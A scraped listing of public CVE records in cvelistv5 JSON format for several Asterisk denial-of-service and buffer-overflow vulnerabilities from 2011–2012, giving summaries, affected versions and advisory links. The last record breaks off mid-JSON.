cve-2012-1183

Vulnerability from cvelistv5

Published

2012-09-18 18:00

Modified

2024-08-06 18:53

Severity ?

Summary

Stack-based buffer overflow in the milliwatt_generate function in the Miliwatt application in Asterisk 1.4.x before 1.4.44, 1.6.x before 1.6.2.23, 1.8.x before 1.8.10.1, and 10.x before 10.2.1, when the o option is used and the internal_timing option is off, allows remote attackers to cause a denial of service (application crash) via a large number of samples in an audio packet.

References

▼	URL	Tags
	http://www.debian.org/security/2012/dsa-2460	vendor-advisory, x_refsource_DEBIAN
	http://www.openwall.com/lists/oss-security/2012/03/16/17	mailing-list, x_refsource_MLIST
	http://downloads.asterisk.org/pub/security/AST-2012-002.pdf	x_refsource_CONFIRM
	http://archives.neohapsis.com/archives/bugtraq/2012-03/0069.html	mailing-list, x_refsource_BUGTRAQ
	http://osvdb.org/80125	vdb-entry, x_refsource_OSVDB
	http://www.securityfocus.com/bid/52523	vdb-entry, x_refsource_BID
	http://secunia.com/advisories/48941	third-party-advisory, x_refsource_SECUNIA
	http://www.asterisk.org/node/51797	x_refsource_CONFIRM
	http://secunia.com/advisories/48417	third-party-advisory, x_refsource_SECUNIA
	https://exchange.xforce.ibmcloud.com/vulnerabilities/74082	vdb-entry, x_refsource_XF
	http://www.openwall.com/lists/oss-security/2012/03/16/10	mailing-list, x_refsource_MLIST
	http://downloads.asterisk.org/pub/security/AST-2012-002-1.8.diff	x_refsource_CONFIRM
	http://securitytracker.com/id?1026812	vdb-entry, x_refsource_SECTRACK

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T18:53:35.794Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "DSA-2460",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2012/dsa-2460"
          },
          {
            "name": "[oss-security] 20120316 Re: CVE Request -- Asterisk: AST-2012-002 and AST-2012-003  flaws",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2012/03/16/17"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2012-002.pdf"
          },
          {
            "name": "20120315 AST-2012-002: Remote Crash Vulnerability in Milliwatt Application",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://archives.neohapsis.com/archives/bugtraq/2012-03/0069.html"
          },
          {
            "name": "80125",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/80125"
          },
          {
            "name": "52523",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/52523"
          },
          {
            "name": "48941",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/48941"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.asterisk.org/node/51797"
          },
          {
            "name": "48417",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/48417"
          },
          {
            "name": "asterisk-milliwattgenerate-dos(74082)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/74082"
          },
          {
            "name": "[oss-security] 20120316 CVE Request -- Asterisk: AST-2012-002 and AST-2012-003  flaws",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2012/03/16/10"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2012-002-1.8.diff"
          },
          {
            "name": "1026812",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1026812"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2012-03-15T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Stack-based buffer overflow in the milliwatt_generate function in the Miliwatt application in Asterisk 1.4.x before 1.4.44, 1.6.x before 1.6.2.23, 1.8.x before 1.8.10.1, and 10.x before 10.2.1, when the o option is used and the internal_timing option is off, allows remote attackers to cause a denial of service (application crash) via a large number of samples in an audio packet."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-08-28T12:57:01",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "name": "DSA-2460",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2012/dsa-2460"
        },
        {
          "name": "[oss-security] 20120316 Re: CVE Request -- Asterisk: AST-2012-002 and AST-2012-003  flaws",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2012/03/16/17"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2012-002.pdf"
        },
        {
          "name": "20120315 AST-2012-002: Remote Crash Vulnerability in Milliwatt Application",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://archives.neohapsis.com/archives/bugtraq/2012-03/0069.html"
        },
        {
          "name": "80125",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/80125"
        },
        {
          "name": "52523",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/52523"
        },
        {
          "name": "48941",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/48941"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.asterisk.org/node/51797"
        },
        {
          "name": "48417",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/48417"
        },
        {
          "name": "asterisk-milliwattgenerate-dos(74082)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/74082"
        },
        {
          "name": "[oss-security] 20120316 CVE Request -- Asterisk: AST-2012-002 and AST-2012-003  flaws",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2012/03/16/10"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2012-002-1.8.diff"
        },
        {
          "name": "1026812",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1026812"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2012-1183",
    "datePublished": "2012-09-18T18:00:00",
    "dateReserved": "2012-02-14T00:00:00",
    "dateUpdated": "2024-08-06T18:53:35.794Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2012-2947

Vulnerability from cvelistv5

Published

2012-06-02 15:00

Modified

2024-08-06 19:50

Severity ?

Summary

chan_iax2.c in the IAX2 channel driver in Certified Asterisk 1.8.11-cert before 1.8.11-cert2 and Asterisk Open Source 1.8.x before 1.8.12.1 and 10.x before 10.4.1, when a certain mohinterpret setting is enabled, allows remote attackers to cause a denial of service (daemon crash) by placing a call on hold.

References

▼	URL	Tags
	http://www.debian.org/security/2012/dsa-2493	vendor-advisory, x_refsource_DEBIAN
	http://www.securitytracker.com/id?1027102	vdb-entry, x_refsource_SECTRACK
	http://archives.neohapsis.com/archives/bugtraq/2012-05/0144.html	mailing-list, x_refsource_BUGTRAQ
	http://downloads.asterisk.org/pub/security/AST-2012-007.html	x_refsource_CONFIRM
	http://secunia.com/advisories/49303	third-party-advisory, x_refsource_SECUNIA

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T19:50:05.310Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "DSA-2493",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2012/dsa-2493"
          },
          {
            "name": "1027102",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1027102"
          },
          {
            "name": "20120529 AST-2012-007: Remote crash vulnerability in IAX2 channel driver.",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://archives.neohapsis.com/archives/bugtraq/2012-05/0144.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2012-007.html"
          },
          {
            "name": "49303",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/49303"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2012-05-29T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "chan_iax2.c in the IAX2 channel driver in Certified Asterisk 1.8.11-cert before 1.8.11-cert2 and Asterisk Open Source 1.8.x before 1.8.12.1 and 10.x before 10.4.1, when a certain mohinterpret setting is enabled, allows remote attackers to cause a denial of service (daemon crash) by placing a call on hold."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2012-06-23T09:00:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "DSA-2493",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2012/dsa-2493"
        },
        {
          "name": "1027102",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1027102"
        },
        {
          "name": "20120529 AST-2012-007: Remote crash vulnerability in IAX2 channel driver.",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://archives.neohapsis.com/archives/bugtraq/2012-05/0144.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2012-007.html"
        },
        {
          "name": "49303",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/49303"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2012-2947",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "chan_iax2.c in the IAX2 channel driver in Certified Asterisk 1.8.11-cert before 1.8.11-cert2 and Asterisk Open Source 1.8.x before 1.8.12.1 and 10.x before 10.4.1, when a certain mohinterpret setting is enabled, allows remote attackers to cause a denial of service (daemon crash) by placing a call on hold."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "DSA-2493",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2012/dsa-2493"
            },
            {
              "name": "1027102",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id?1027102"
            },
            {
              "name": "20120529 AST-2012-007: Remote crash vulnerability in IAX2 channel driver.",
              "refsource": "BUGTRAQ",
              "url": "http://archives.neohapsis.com/archives/bugtraq/2012-05/0144.html"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2012-007.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2012-007.html"
            },
            {
              "name": "49303",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/49303"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2012-2947",
    "datePublished": "2012-06-02T15:00:00",
    "dateReserved": "2012-05-29T00:00:00",
    "dateUpdated": "2024-08-06T19:50:05.310Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2011-1147

Vulnerability from cvelistv5

Published

2011-03-15 17:00

Modified

2024-08-06 22:14

Severity ?

Summary

Multiple stack-based and heap-based buffer overflows in the (1) decode_open_type and (2) udptl_rx_packet functions in main/udptl.c in Asterisk Open Source 1.4.x before 1.4.39.2, 1.6.1.x before 1.6.1.22, 1.6.2.x before 1.6.2.16.2, and 1.8 before 1.8.2.4; Business Edition C.x.x before C.3.6.3; AsteriskNOW 1.5; and s800i (Asterisk Appliance), when T.38 support is enabled, allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted UDPTL packet.

References

▼	URL	Tags
	http://secunia.com/advisories/43702	third-party-advisory, x_refsource_SECUNIA
	http://www.securityfocus.com/bid/46474	vdb-entry, x_refsource_BID
	http://www.debian.org/security/2011/dsa-2225	vendor-advisory, x_refsource_DEBIAN
	http://secunia.com/advisories/43429	third-party-advisory, x_refsource_SECUNIA
	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055421.html	vendor-advisory, x_refsource_FEDORA
	http://www.vupen.com/english/advisories/2011/0635	vdb-entry, x_refsource_VUPEN
	http://www.openwall.com/lists/oss-security/2011/03/11/2	mailing-list, x_refsource_MLIST
	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055030.html	vendor-advisory, x_refsource_FEDORA
	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055634.html	vendor-advisory, x_refsource_FEDORA
	http://www.securitytracker.com/id?1025101	vdb-entry, x_refsource_SECTRACK
	http://www.openwall.com/lists/oss-security/2011/03/11/8	mailing-list, x_refsource_MLIST
	http://downloads.asterisk.org/pub/security/AST-2011-002.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T22:14:27.830Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "43702",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/43702"
          },
          {
            "name": "46474",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/46474"
          },
          {
            "name": "DSA-2225",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2011/dsa-2225"
          },
          {
            "name": "43429",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/43429"
          },
          {
            "name": "FEDORA-2011-2438",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055421.html"
          },
          {
            "name": "ADV-2011-0635",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2011/0635"
          },
          {
            "name": "[oss-security] 20110311 CVE Request -- Asterisk AST-2011-002 / Multiple array overflow and crash vulnerabilities in UDPTL code",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2011/03/11/2"
          },
          {
            "name": "FEDORA-2011-2360",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055030.html"
          },
          {
            "name": "FEDORA-2011-2558",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055634.html"
          },
          {
            "name": "1025101",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1025101"
          },
          {
            "name": "[oss-security] 20110311 Re: CVE Request -- Asterisk AST-2011-002 / Multiple array overflow and crash vulnerabilities in UDPTL code",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2011/03/11/8"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2011-002.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2011-03-11T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple stack-based and heap-based buffer overflows in the (1) decode_open_type and (2) udptl_rx_packet functions in main/udptl.c in Asterisk Open Source 1.4.x before 1.4.39.2, 1.6.1.x before 1.6.1.22, 1.6.2.x before 1.6.2.16.2, and 1.8 before 1.8.2.4; Business Edition C.x.x before C.3.6.3; AsteriskNOW 1.5; and s800i (Asterisk Appliance), when T.38 support is enabled, allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted UDPTL packet."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2011-08-23T09:00:00",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "name": "43702",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/43702"
        },
        {
          "name": "46474",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/46474"
        },
        {
          "name": "DSA-2225",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2011/dsa-2225"
        },
        {
          "name": "43429",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/43429"
        },
        {
          "name": "FEDORA-2011-2438",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055421.html"
        },
        {
          "name": "ADV-2011-0635",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2011/0635"
        },
        {
          "name": "[oss-security] 20110311 CVE Request -- Asterisk AST-2011-002 / Multiple array overflow and crash vulnerabilities in UDPTL code",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2011/03/11/2"
        },
        {
          "name": "FEDORA-2011-2360",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055030.html"
        },
        {
          "name": "FEDORA-2011-2558",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055634.html"
        },
        {
          "name": "1025101",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1025101"
        },
        {
          "name": "[oss-security] 20110311 Re: CVE Request -- Asterisk AST-2011-002 / Multiple array overflow and crash vulnerabilities in UDPTL code",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2011/03/11/8"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2011-002.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "secalert@redhat.com",
          "ID": "CVE-2011-1147",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple stack-based and heap-based buffer overflows in the (1) decode_open_type and (2) udptl_rx_packet functions in main/udptl.c in Asterisk Open Source 1.4.x before 1.4.39.2, 1.6.1.x before 1.6.1.22, 1.6.2.x before 1.6.2.16.2, and 1.8 before 1.8.2.4; Business Edition C.x.x before C.3.6.3; AsteriskNOW 1.5; and s800i (Asterisk Appliance), when T.38 support is enabled, allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted UDPTL packet."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "43702",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/43702"
            },
            {
              "name": "46474",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/46474"
            },
            {
              "name": "DSA-2225",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2011/dsa-2225"
            },
            {
              "name": "43429",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/43429"
            },
            {
              "name": "FEDORA-2011-2438",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055421.html"
            },
            {
              "name": "ADV-2011-0635",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2011/0635"
            },
            {
              "name": "[oss-security] 20110311 CVE Request -- Asterisk AST-2011-002 / Multiple array overflow and crash vulnerabilities in UDPTL code",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2011/03/11/2"
            },
            {
              "name": "FEDORA-2011-2360",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055030.html"
            },
            {
              "name": "FEDORA-2011-2558",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055634.html"
            },
            {
              "name": "1025101",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id?1025101"
            },
            {
              "name": "[oss-security] 20110311 Re: CVE Request -- Asterisk AST-2011-002 / Multiple array overflow and crash vulnerabilities in UDPTL code",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2011/03/11/8"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2011-002.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2011-002.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2011-1147",
    "datePublished": "2011-03-15T17:00:00",
    "dateReserved": "2011-03-03T00:00:00",
    "dateUpdated": "2024-08-06T22:14:27.830Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2011-2529

Vulnerability from cvelistv5

Published

2011-07-06 19:00

Modified

2024-08-06 23:08

Severity ?

Summary

chan_sip.c in the SIP channel driver in Asterisk Open Source 1.6.x before 1.6.2.18.1 and 1.8.x before 1.8.4.3 does not properly handle '\0' characters in SIP packets, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted packet.

References

▼	URL	Tags
	https://exchange.xforce.ibmcloud.com/vulnerabilities/68203	vdb-entry, x_refsource_XF
	http://www.osvdb.org/73307	vdb-entry, x_refsource_OSVDB
	http://www.securityfocus.com/bid/48431	vdb-entry, x_refsource_BID
	http://downloads.asterisk.org/pub/security/AST-2011-008.html	x_refsource_CONFIRM
	http://secunia.com/advisories/45239	third-party-advisory, x_refsource_SECUNIA
	http://downloads.asterisk.org/pub/security/AST-2011-008.diff	x_refsource_CONFIRM
	http://www.debian.org/security/2011/dsa-2276	vendor-advisory, x_refsource_DEBIAN
	http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html	vendor-advisory, x_refsource_FEDORA
	http://secunia.com/advisories/45048	third-party-advisory, x_refsource_SECUNIA
	http://securitytracker.com/id?1025706	vdb-entry, x_refsource_SECTRACK
	http://secunia.com/advisories/45201	third-party-advisory, x_refsource_SECUNIA

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T23:08:22.019Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "asterisk-sipsockread-dos(68203)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/68203"
          },
          {
            "name": "73307",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://www.osvdb.org/73307"
          },
          {
            "name": "48431",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/48431"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2011-008.html"
          },
          {
            "name": "45239",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/45239"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2011-008.diff"
          },
          {
            "name": "DSA-2276",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2011/dsa-2276"
          },
          {
            "name": "FEDORA-2011-8914",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html"
          },
          {
            "name": "45048",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/45048"
          },
          {
            "name": "1025706",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1025706"
          },
          {
            "name": "45201",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/45201"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2011-06-20T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "chan_sip.c in the SIP channel driver in Asterisk Open Source 1.6.x before 1.6.2.18.1 and 1.8.x before 1.8.4.3 does not properly handle \u0027\\0\u0027 characters in SIP packets, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted packet."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-08-28T12:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "asterisk-sipsockread-dos(68203)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/68203"
        },
        {
          "name": "73307",
          "tags": [
            "vdb-entry",
